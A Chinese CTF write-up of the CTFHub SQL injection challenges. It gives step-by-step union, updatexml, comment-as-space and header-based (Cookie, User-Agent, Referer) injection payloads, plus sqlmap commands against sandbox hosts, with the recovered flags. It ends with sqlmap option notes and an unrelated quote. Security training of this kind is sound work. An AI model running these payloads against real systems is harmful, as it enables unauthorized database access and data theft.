CTFHub技能树 Web-SQL注入详解_资讯

CTFHub技能树 Web-SQL注入详解

创始人

2024-02-10 15:59:43

0次

文章目录

- 0x01 整数型注入
- 0x02 字符型注入
- 0x03 报错注入
- 0x04 布尔盲注
- 0x05 时间盲注
- 0x06 MySql结构
- 0x07 Cookie注入
- 0x08 空格绕过
- 0x09 UA注入
- 0x10 Refer注入
- 总结
- 摘抄

0x01 整数型注入

在这里插入图片描述

解题WP
第一步尝试闭合点
在这里插入图片描述

第二步判断列数

id=1 order by 2 页面正常
id=1 order by 3 页面未回显数据

在这里插入图片描述

第三步联合查询，判断回显位置
/?id=-1 union select 1,2

在这里插入图片描述

第四步执行数据库语句
-1 union select 1,database()
在这里插入图片描述

第五步查询当前数据库下的表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
在这里插入图片描述

第六步查询表下的字段
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
在这里插入图片描述

第七步输入字段值
?id=-1 union select 1,flag from sqli.flag

在这里插入图片描述

0x02 字符型注入

在这里插入图片描述

解题WP
第一步闭合方式
/?id=1' --+'
在这里插入图片描述

第二步查看回显字段的位数

id=1' order by 2 --+' 页面正常
id=1' order by 3 --+' 页面未回显数据

在这里插入图片描述

第三步判断回显的位置
-1' union select 1,2 --+'
在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 --dbs
在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
在这里插入图片描述

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

在这里插入图片描述

0x03 报错注入

在这里插入图片描述

第一步判断注入

id=1页面回显正常
id=1'发现页面报错，回显数据库错误信息

在这里插入图片描述

第二步使用updatexml注入，数据库名称

 updatexml(xml_document,xpath_string,new_value)
第一个参数：xml_document，为xml文档对象名称，是数据库x库的doc字段
第二个参数：xpath_string:xpath语法
第三个参数：new_value:替换查找到的符合条件的字符(string)/?id=1 and updatexml(1,concat(0x5e,database()),1)

在这里插入图片描述

第三步获取表名
编解码在线工具
https://www.toolhelper.cn/

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69),0x5e),1)

在这里插入图片描述

第四步获取字段

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),0x5e),1)

在这里插入图片描述

第五步获取字段值

/?id=1 and updatexml(1,concat(0x5e,(select flag from sqli.flag),0x5e),1)
发先flag少了一部分
mid 就可以得到flag后面的一部分
/?id=1 and updatexml(1,concat(0x5e,mid((select flag from sqli.flag),32),0x5e),1)

在这里插入图片描述

0x04 布尔盲注

在这里插入图片描述

--dbs 
-D sqli --tables 
-D sqli -T flag columns --dump

在这里插入图片描述

sqlmap -u "http://challenge-70a9e8b793dd9d2b.sandbox.ctfhub.com:10800/?id=1" --dbs

在这里插入图片描述

sqlmap -u "http://url/?id=1" -D sqli --tables --batch
在这里插入图片描述

sqlmap -u "http://url/?id=1" -D sqli -T flag --columns --batch
在这里插入图片描述

 sqlmap  -u "http://url/?id=1" -D sqli -T flag -C flag --dump --batch 
ctfhub{c04dd02440c0191e73caad9c}

在这里插入图片描述

0x05 时间盲注

--dbs 
-D sqli --tables 
-D sqli -T flag --columns 
-D sqli -T flag -C flag --dump
--batch

在这里插入图片描述

0x06 MySql结构

在这里插入图片描述

--dbs 
-D sqli --tables 
-D sqli -T whvvzxswne columns --dump
sqlmap -u http://url/?id=1  -D sqli -T  qtcwgcmzbh   -C  jkcwouoqak   --dump  --batch 
ctfhub{f37e47264f12f73fe5129649}

在这里插入图片描述

0x07 Cookie注入

在这里插入图片描述

第一步确定闭合

Cookie: id=1  数字型注入

在这里插入图片描述

第二步查看回显字段的位数

Cookie: id=1 order by 2; 页面正常
Cookie: id=1 order by 3; 页面异常

在这里插入图片描述

第三步使用union查询，查看回显位置

Cookie: id=-1 union select 1,2;

在这里插入图片描述

第四步查看当前数据库

Cookie: id=-1 union select 1,database();

在这里插入图片描述

第五步查看表名

Cookie: id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1);
trxfffaswl
news

在这里插入图片描述

第六步查询字段

Cookie: id=-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='trxfffaswl' limit 0,1);
brdjzysggi

在这里插入图片描述

第七步查看字段值

Cookie: id=-1 union select 1,(select brdjzysggi from trxfffaswl limit 0,1);

在这里插入图片描述

0x08 空格绕过

在这里插入图片描述

第一步确定闭合
?id=1/**/or/**/1=1 //测试or,and等特殊字符是否被过滤

第二步查看回显字段的位数

?id=1/**/order/**/by/**/2;页面正常
?id=1/**/order/**/by/**/3; 页面异常

在这里插入图片描述

第三步使用union查询，查看回显位置

?id=-1/**/union/**/select/**/1,2

在这里插入图片描述

第四步查看当前数据库

-1/**/union/**/select/**/1,database()

在这里插入图片描述

第五步查看表名

表明1
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/0,1)
表名2
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1,1)
ID: imrqzusgig
Data: news

在这里插入图片描述

第六步查询字段

?id=-1/**/union/**/select/**/1,(select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='imrqzusgig'/**/limit/**/0,1)
Data: sxiiqtwdft

在这里插入图片描述

第七步查看字段值

?id=-1/**/union/**/select/**/1,(select/**/sxiiqtwdft/**/from/**/imrqzusgig/**/limit/**/0,1)

0x09 UA注入

在这里插入图片描述

第一步构造闭合

1 or 1=2 页面回显正常
1 and 1=2

在这里插入图片描述

第二步查询列数量

1 order by 1,2,3  页面报错
1 order by 1,2  页面正常

在这里插入图片描述

第三步判断回显，查询数据库

-1 union select 1,2 
-1 union select 1,database()

在这里插入图片描述

第四步查看表名称

-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
cutmmwbdxt
news

在这里插入图片描述

第五步查看字段名称

-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='cutmmwbdxt' limit 0,1)
iezonoaoey

在这里插入图片描述

第六步查看字段值

-1 union select 1,(select iezonoaoey   from cutmmwbdxt limit 0,1)
ctfhub{509b5eecd5afe7a69925baad}

在这里插入图片描述

0x10 Refer注入

在这里插入图片描述

第一步构造闭合

1 or 1=2 页面回显正常
1 and 1=2

在这里插入图片描述

第二步查询列数量

1 order by 1,2,3  页面报错
1 order by 1,2  页面正常

在这里插入图片描述

第三步判断回显，查询数据库

-1 union select 1,2 
-1 union select 1,database()

在这里插入图片描述

第四步查看表名称

-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
skwdbewppe
news

在这里插入图片描述

第五步查看字段名称

-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='skwdbewppe' limit 0,1)
lmdptzbbsz

在这里插入图片描述

第六步查看字段值

-1 union select 1,(select lmdptzbbsz  from skwdbewppe limit 0,1)
ctfhub{696d71da4c29a525eb09512d}

在这里插入图片描述

所有的SQL注入完成
在这里插入图片描述

总结

level有5级，越高检测越全，默认为 1

--level 1 检测Get和Post--level 2 检测HTTP Cookie--level 3 检测User-Agent和Referer--level 4 检测--level 5 检测 HOST 头

risk有3级，级别越高风险越大，默认为1

--risk 2 会在默认的检测上添加大量时间型盲注语句测试--risk 3 会在原基础上添加OR 类型的布尔型盲注 ，可能会update导致修改数据库

摘抄

如果你有一堆苹果，有好有坏，你应该先吃好的，把烂的扔掉。如果你先吃坏的，好的也会变坏，你就永远吃不到好的，这就是苹果定律。
苹果定律告诉我们，人必须善于取舍，要记住先做你生命中最重要的事。
仔细想想，人生曾有多少次机遇被我们错过，有多少重要的事被我们割舍。每个阶段都有不同的目标，找到当下最核心最重要的事，是一个人最大的本事和能力。
　　---《苹果定律》

上一篇：石家庄正定县恢复种植国稻种芯·中国水稻节：河北绘就画卷

下一篇：用蜜蜂造句简单还要短

CTFHub技能树 Web-SQL注入详解

文章目录

0x01 整数型注入

0x02 字符型注入

0x03 报错注入

0x04 布尔盲注

0x05 时间盲注

0x06 MySql结构

0x07 Cookie注入

0x08 空格绕过

0x09 UA注入

0x10 Refer注入

总结

摘抄

相关内容

热门资讯